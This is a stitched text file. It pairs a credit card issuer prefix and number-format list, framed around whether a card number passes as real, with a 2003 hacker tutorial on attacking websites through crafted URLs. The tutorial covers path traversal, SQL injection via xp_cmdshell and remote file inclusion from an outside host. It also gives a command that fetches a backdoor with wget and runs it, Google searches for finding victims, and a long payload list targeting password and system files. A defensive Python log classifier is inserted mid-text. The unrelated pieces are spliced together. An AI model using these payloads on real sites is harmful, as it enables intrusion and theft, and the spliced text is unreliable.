Bank of Hoven 5419 1933 ???-???-????
Colonial National Bank 5420 ???? 800-544-8205
Hughes Emp. Fed. Union 5423 ???? ???-???-????
Citibank Classic 5424 1065 ???-???-????
Citibank 5424 1067 800-843-0777
Bank of N.Y. 5432 3754 800-942-1977
Chase Manhattan 5465 1665 800-842-8403
5110 Universal Travel Voucher
5130 Eurocard France
5150 Credit Systems, Inc.
5172 First Bank Card Center
5190 Bank of Montreal
5201 Mellon Bank, N.A
5211 Chemical Bank Delaware
5212 F.C.C National Bank
5217 Union Trust
5223 Trustmark National Bank
5224 Midland Bank
5226 Eurocard Ab

Discover 6013 MNBA

1-800-DISCOVER or 1-800-347-2683


American Express (Prefixes)

Prefixes- Type-

3710 3712 3731 Green 800-528-4800/292-AMEX
3718 3728 Gold 800-327-2177/445-7989
3728 Platinum
3737 Optima 800-635-5955
3787 3782 Corporate






BANK CARD FORMATS



CARD NUMBERING FORMATS ARE ACCORDING TO THIS SCHEDULE: "*4-*5" MEANS A
9 DIGIT NUMBER IN A GROUP OF 4, THEN 5. "5XXX-*5" MEANS THE SAME THING,
EXCEPT THAT THE FIRST DIGIT OF THE 4 NUMBER GROUP IS ALWAYS A "5", ETC.
WHEN "5230-8888-*4-*4" TYPE IS SHOWN, "5230-8888-" MEANS THAT THE FIRST 8 DIGITS
ARE AS SHOWN, FOLLOWED BY TWO GROUPS OF 4 DIGITS, ETC. BY KNOWING THIS
FORMAT, YOU COULD UNDERSTAND WHAT YOUR CREDIT CARD NUMBERS MEAN, AND HOW
VARIOUS MAIL ORDER AND TOUCHTONE PHONE SERVICES DETERMINE IF THE CARD
NUMBER GIVEN TO THEM IS REAL. WON'T YOU SLEEP BETTER AT NIGHT KNOWING HOW
THE BANKS NUMBER THEIR CARDS, AND HOW THEIR AUTHENTICITY IS CHECKED :)



BANK OF AMERICA
M: 5XXX-*4-*4-*4
V: 4XXX-*4-*4-*4



CHEMICAL BANK OF NY
M: 5211-*4-*4-*4
V: 4211-*4-*4-*4



COMPUTER COMMUNICATIONS
M: 518X-*4-*4-*4
V: 4XXX-*4-*4-*4



HARRIS TRUST AND SAVINGS
M: 5230-8888-*4-*4
V: 4681-2XX-*3-*3



CITIBANK OR CITICORP
M: 5218-*4-*4-*4
M: 5424-18XX-*4-*4
V: 4128-*3-*3-*3
V: 4271-38XX-*4-*4



CONNECTICUT NATL BANK
M: 5272-*4-*4-*4
V: 4040-*3-*3-*3



CHASE MANHATTAN BANK
M: 5464-*4-*4-*4
V: 4225-*3-*3-*3
V: 4226-*3-*3-*3



CROCKER NATL BANK
M: 5282-*4-*4-*4
V: 4040-*3-*3-*3


##########################################################################

Attacks via Strings

By f0ul @ hax0rslab.org
Date: 26-10-2003


1 - Intro
2 - Common Strings
3 - Building Your String
4 - Looking for Vulnerable Sites
5 - Opening a Shell and Getting Root
5 - Bonus[surprise] ;)
6 - Don't Be an SC
7 - Wrapping Up


-------------------------------------------------------------------------------------
1 - Introduction:

Hi, here I am, with the pleasant mission of passing on a bit more knowledge
to you. The subject I'm going to talk about today is nothing very special;
it is really simple and basic.

If you are a hacker, you don't even need to read this... I'm writing this txt for the
tinkerers who are just getting started in hacking, and the subject I'll cover here is of
great importance... "sometimes" lol

Oh, I also wanted to apologize: it had been a while since I last wrote anything
about hacking. I was extremely busy with work (real-life stuff), but now I have
more free time, so I'm going to start writing some cool texts for you ;)...

I'll start with this one, a very simple text that shows the various
ways (not all of them) of attacking a site via the browser... I won't talk about programming
or more advanced things, since I'll go straight to the point... ;)

Happy reading ;)

For those who don't know, port 80 is the default port for websites, and on this port
we can find lots of little security bugs which, when
exploited by someone with bad intentions, can result in remote access!
Usually this remote access comes with restricted permissions, but depending on the
flaw the attacker exploited, he may have obtained full permission on the server...
In other words, he can do whatever comes into his head!! lol

This technique can be called "FingerPrinting" or "Port 80 attacks"; I
personally, and other people out there too, call it "Attack via String".
It doesn't matter which operating system is running behind the website:
this technique is applicable to any website running cgi, php, asp and
other languages that have bugZ...



-------------------------------------------------------------------------------------
2 - Common Strings:

I'll now give some common examples of strings that can be used
to exploit websites and get remote access. I don't intend to show ALL
the possible forms of a string, but I'll try to show the most used ones, so
that you can build your own strings in the future using only the
knowledge acquired here + your imagination... lol ;)

Along with each string I'll give a brief description of it and how to use it in an attack.

The examples follow:

Example 1:

> http://host/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt

" * " -> The asterisk is often used by the attacker simply as an
argument to the command!

The string above simply listed all the .txt files in the directory e:\WINNT.
It is a string generally used to find log files or any other important file
on the compromised win server. (win is lame stuff) forget that part... hehe

http://host/blah.pl?somethingelse=ls%20*.txt

This string also listed all the .txt files, but on a UNIX system. (unix is haxo stuff)


Example 2:

> http://host/cgi-bin/file.asp?name=john`;EXEC master.dbo.xp_cmdshell'cmd.exe dir c:'--

" ' " -> Anyone who plays with SQL Injection should know this character; it is a character
particular to SQL. Many programs out there were written the wrong way by
someone with little knowledge of programming/security, and through the programmer's lack
of knowledge holes were left in the program, making it possible for an attacker
to insert SQL commands into the script. If that really happens and the Administrator of the
server has run SQL as root on unix... then the attacker will have obtained
full access to the server (root), or the server's passwords, or who knows what, hehe, that depends
a lot on the attacker's knowledge and imagination. ;)

In the example above, cmd.exe was executed on a winNT machine. With that
the attacker can have remote control of the machine, add users, do
uploads, downloads, steal passwords and whatever else he wants!

For more information on SQL Injection, go to google and search for
"Sql Injection" ;) and if after searching you REALLY don't find anything, you can send me some
e-mails ;)


Example 3:

> http://site/scripts/root.exe?/c+dir+c:
" + " -> Sometimes the (+) is used as a blank space, similar to "%20".
When this character (+) is used in an attack it is almost always together with
cmd.exe or cmd.php, so you can use the (+) to help build strings.

This example showed a string working with a backdoor called
root.exe; this backdoor is usually installed by the sadmind/IIS Worm, Code Red, Nimda

If you want more information about this string, see: www.cert.org/incident_notes/IN-2001-09.html


Example 4:

> /cgi-sys/guestbook.cgi?user=cpanel&template=|id;uname;ls;|

" ; " -> The ; is widely used so that you can give several commands at the same time.. duh! ;)

In this example, taking advantage of a vuln in cpanel, I'm running an id + a uname
plus an ls, together in the same string.. see how easy.. uaehahuea
now imagine something COOLER: you could fetch, compile and run a backdoor with a single command..


Example 5:

> http://www.host.com/index.php?file=http://www.sitedohaxo.net/script.txt?&cmd=uname

This is without doubt the moooost used string nowadays by the crowd (kids). It has existed for a long
time and even today you can still find sites vulnerable to it.. lol that's a shame ;(

Well, it is very simple and you've probably already figured out what it does: it executes on the server the
command you put after cmd=, which in this case ran a "uname". For it to work,
you need to have a site on the net hosting the file script.txt, which contains;

system($cmd);
?>

and do the same as the example up there.. ;)

-------------------------------------------------------------------------------------
3 - Building Your String

Well, as a tinkerer, you should know that EVERY single day a new vulnerability comes out;
just look at the site securityfocus.net and you'll find php, cgi, asp, sql vulns, etc

From many of them you can build a string to exploit the vuln right from your
browser, simple, easy and quick...

You can use your imagination too....
let's take the example of a flaw/string already known in the underground.

> http://www.host.com/index.php?file=http://www.sitedohaxo.net/script.txt?&cmd=uname

There is the string just as it is properly used... but now imagine that you can change
it a bit, so that you can find more sites vulnerable to it,

Let's change it:

> http://www.host.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=uname

See, I changed "file" to "page"
now if you do a search (I'll explain how to do searches later) you will find many
more sites to exploit, and its functionality stayed the same; you can keep changing it
to other things, e.g. pg, goto, pagina, etc.. doing that increases the chance
of finding vulnerable hosts ;)
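
The request strings in sections 2 and 3 leave recognizable traces in a web server access log. The following Python classifier is an added example, not part of the original text: it runs over constructed log lines built from the page's example URLs and checks every parameter value rather than a parameter name, so renaming "file" to "page" as in section 3 does not change the result. The rule names, the log layout and the double-encoded sample are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rule name -> pattern applied to the whole decoded request target.
TARGET_RULES = {
    "path_traversal": re.compile(r"\.\.[\\/]"),
    "windows_shell": re.compile(r"(?:cmd|root)\.exe", re.I),
    "sql_xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
}
# Rule name -> pattern applied to each decoded query parameter value.
VALUE_RULES = {
    # A parameter whose value is itself a URL (remote include, example 5).
    "remote_include": re.compile(r"^\s*(?:https?|ftp)://", re.I),
    # Command separators and substitution characters (examples 2 and 4).
    "shell_metachar": re.compile(r"[|;`]|\$\("),
    # Weak on its own: a value such as "id" can be a legitimate sort key,
    # so weight this rule together with the others.
    "unix_command": re.compile(r"(?:^|[|;`]\s*)(?:id|uname|ls|wget|chmod|cd)\b"),
}


def decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_target(target):
    """Return the sorted rule names matched by one request target."""
    hits = set()
    whole = decode(target)
    for name, rule in TARGET_RULES.items():
        if rule.search(whole):
            hits.add(name)
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        _, sep, raw_value = pair.partition("=")
        # A query without "=" (example 3) is treated as one bare value.
        value = decode(raw_value if sep else pair)
        for name, rule in VALUE_RULES.items():
            if rule.search(value):
                hits.add(name)
    return sorted(hits)


def scan_log(lines):
    """Return (target, rule names) for every log line that matches a rule."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = classify_target(match.group(1))
        if hits:
            findings.append((match.group(1), hits))
    return findings


# Constructed sample data: targets taken from the examples on this page,
# plus one double-encoded traversal and two benign requests.
LOG_FMT = '192.0.2.10 - - [26/Oct/2003:10:00:00 -0300] "GET {} HTTP/1.0" 200 512'
SAMPLE_TARGETS = [
    r"/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt",
    "/blah.pl?somethingelse=ls%20*.txt",
    "/cgi-bin/file.asp?name=john%60;EXEC%20master.dbo.xp_cmdshell%27cmd.exe%20dir%20c:%27--",
    "/scripts/root.exe?/c+dir+c:",
    "/cgi-sys/guestbook.cgi?user=cpanel&template=|id;uname;ls;|",
    "/index.php?file=http://www.sitedohaxo.net/script.txt?&cmd=uname",
    "/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=uname",
    "/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fhosts",
    "/index.php?page=news&id=42",
    "/search?q=how+to+use+ls",
]
SAMPLE_LOG = [LOG_FMT.format(target) for target in SAMPLE_TARGETS]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(", ".join(hits), "<-", target)
```

The two benign requests at the end of the sample produce no findings, which is the behaviour to confirm against real traffic before alerting on any single rule.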



-------------------------------------------------------------------------------------
4 - Looking for Vulnerable Sites

Looking for vulnerable sites is very easy; the internet is full of tools for that.
One of them, and let's say a veeery powerful one, is the site www.google.com, which lets
the visitor do a complete search across the internet!

Let's see a practical example, using a string that is heavily used these days... lol

> http://www.host.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=uname

Go to google.com and in search type:

allinurl: *.php?page=
or
allinurl: *.php?pagina=
or
allinurl: *.php?file=
or anything else, use your imagination ;) see how easy it is...



-------------------------------------------------------------------------------------
5 - Opening a Shell and Getting Root

Well, we've finally reached the coolest part of the txt ;)
To open a shell through the browser you will need:

1 - A good string,
2 - A site vulnerable to the string, duh! haueha
3 - A nice little backdoor
4 - A good local exploit

Those are the 4 basic things you'll need.. and now see how easy it is...

With the string and the vulnerable site in hand, do:

>http://www.hostvul.com/index.php?page=http://www.sitedohaxo.net/script.txt?&cmd=cd /tmp;wget www.teusite.com/bd;chmod 777 bd;./bd

DONE.... ;)

See, with one command you have probably opened a shell...
let's understand what this string did:

cd /tmp > Entered the /tmp dir, which is the unix temp dir
wget www.teusite.com/bd > Uploaded your backdoor
chmod 777 bd > Made the backdoor executable for you
./bd > Ran the backdoor

Now you should connect by telnet to the port your backdoor opened...
grab your local exploits and run them.. ;)

Then tinker and tinker.. lol

And that was it; now you should adapt the string as you need ;)



-------------------------------------------------------------------------------------
5 - Bonus[surprise] ;)

EEEEeeeeeeeeeeeeee
Finally the bonus.. hehe
Ah, it's nothing much, I was just hyping it up.. uaheuah
I'm just going to post here almost all the strings I know and that people use like crazy.

ENJOY, USE THEM WISELY.. LOL

/inc/db.inc
/inc/odbc.inc
/inc/sendmail.inc
/inc/sql.inc
/inc/test.php
/include/config.inc
/include/sql.inc
/include/sql.php
/include/test.php
/includes/
/index.js%2570
/index.jsp::$DATA
/index.php%20%20
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/index.php3%20%20
/index.search
/info/
/internal/
/interscan/cgi-bin/FtpSave.dll?I'm%20here
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/isapi/tstisapi.dll
/java/
/join.cfm
/jsp_test/PoolMan.jsp
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/logs/webstar.log
/mailman/edithtml
/manual.php
/merchants/admin.pw
"/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20""Content-Type:%20text%2Fhtml""%3Becho%20""""%20%3B%20id%00"
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/mysql.class
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/odbc.inc
/opendir.php?requesturl=/etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/pass?loginpass=a&redirect=0%2F&Submit=Login
/passcfg
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/phpBB/bb_memberlist.php?sortby=user_regdate
"/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'hoschi'%23"
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
"/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK="".passthru('/bin/ls')."""
"/phpMyAdmin/tbl_copy.php?strCopyTableOK="".passthru('/bin/ls')."""
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phprocketaddin/?page=../../../../../../../etc/hosts
/pi_admin.admin
/ping
/pls/admin_/?
/PoolMan.jsp
/priv/
/private/
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
/remote_login.pl%20
/ROADS/cgi-bin/search.pl?form=search.pl%00
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/run.cgi
/run/forma
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/sbin/
/sbin/nscgi.cfg
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/scripts/*.pl
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:/scripts/blat.exe
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/scripts/formvar.exe
/scripts/mail.cgi
/scripts/mailform.exe
/scripts/mailme.exe
/scripts/mailmepro.exe
/scripts/MailPost.exe
/scripts/mailsend.exe
/scripts/postie.cgi
/scripts/postie.exe
/scripts/rguest.exe
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(""cmd.exe+/c%20dir"");--"
/scripts/toos/mkilog.exe
/scripts/wsendmail.exe
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/s97_cgi.exe
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/servlet//..//../o.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/FormMailServlet?juhu.txt
/servlet/jsp/../../tst.txt
/servlet/psoft.hsphere.CP
/servlet/ServletManager?username=servlet&password=manager
/servlet/ssifilter/../../test.jsp
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/servlet/WebPopServlet?config=uii.txt
/session/pagecount?page=
/shtml/
/stat/
/stats/
/store/customers/
/store/temp_customers/
/stronghold-info
/stronghold-status
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/Test11.asp
/tst/psoft.hsphere.CP/tst/?template_name=x
/upload.html
/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/way-board/way-board.cgi?db=url_to_any_file%00
/way-board/way-board.cgi?db=way-board.cgi%00
/web.config
/Web_store/web_store.cgi?page=../../../../../../../../etc/passw
/webadmin.nsf
/webadmin.ntf
/WebDB/admin_/
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/webmacro/Page?db=tst&wmtemplate=ttt
/webres/discuss/passwd.txt
/WebSTAR%20LOG
/webstar.log
/wwwboard/passwd.txt
/xsql/java/demo/
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
:12000
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:2301/Proxy/LoginResponse
:30001/../../template/shared/indexTemplate.xml
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
:4096/../../../winnt/repair/sam._
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
:631/admin/?op=%c0
:6346/........../windows/win.ini
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
:8000/file/%2E%2E/test1.mp3
:8080/%252e%252e/%252e%252e/%00.jsp
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../ssd.ini
:8080/.jsp/WEB-INF/classes/Env.java
:8080/\../readme.txt
:8080/examples/servlet/SnoopServlet
:8080/index.js%2570
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3"
:9090//etc/shadow

/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini
/a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._
/a.asp/..%c0%af../..%c0%af../winnt/win.ini
/a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
/a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._
/a.asp/..%c1%9c../..%c1%9c../winnt/win.ini
/a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._
/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

